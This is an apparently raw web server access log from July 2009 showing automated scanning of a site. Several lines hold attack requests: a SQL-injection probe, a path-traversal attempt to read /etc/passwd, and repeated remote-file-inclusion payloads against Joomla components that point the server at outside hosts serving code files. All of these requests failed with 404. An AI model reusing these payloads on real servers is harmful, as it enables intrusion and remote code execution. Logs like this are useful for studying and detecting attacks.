125.244.82.2 - - [18/Jul/2009:00:37:28 -0400] "GET /logs/index.php?ItemId=' HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
200.12.51.30 - - [18/Jul/2009:00:38:03 -0400] "GET /logs/access_log.Q109070500/index.php?pag=../../../../../../../../../../../../../etc/passwd%00? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:00:38:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.139.129 - - [18/Jul/2009:00:38:51 -0400] "GET /logs/access_log.Q109062400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [18/Jul/2009:00:38:58 -0400] "GET /logs/access_log.Q109060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [18/Jul/2009:00:39:03 -0400] "GET /logs/access_log.Q109062400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.0.139.129 - - [18/Jul/2009:00:39:13 -0400] "GET /logs/access_log.Q109060800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:00:41:09 -0400] "GET /logs/access_log.Q109060700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.152.230.26 - - [18/Jul/2009:00:41:37 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
62.152.230.26 - - [18/Jul/2009:00:41:38 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
62.152.230.26 - - [18/Jul/2009:00:41:48 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
62.152.230.26 - - [18/Jul/2009:00:41:49 -0400] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
62.152.230.26 - - [18/Jul/2009:00:41:49 -0400] "GET /logs/access_log.Q109070700//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
62.152.230.26 - - [18/Jul/2009:00:41:49 -0400] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.gettingspicy.com/images/yes.txt?%0D?? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
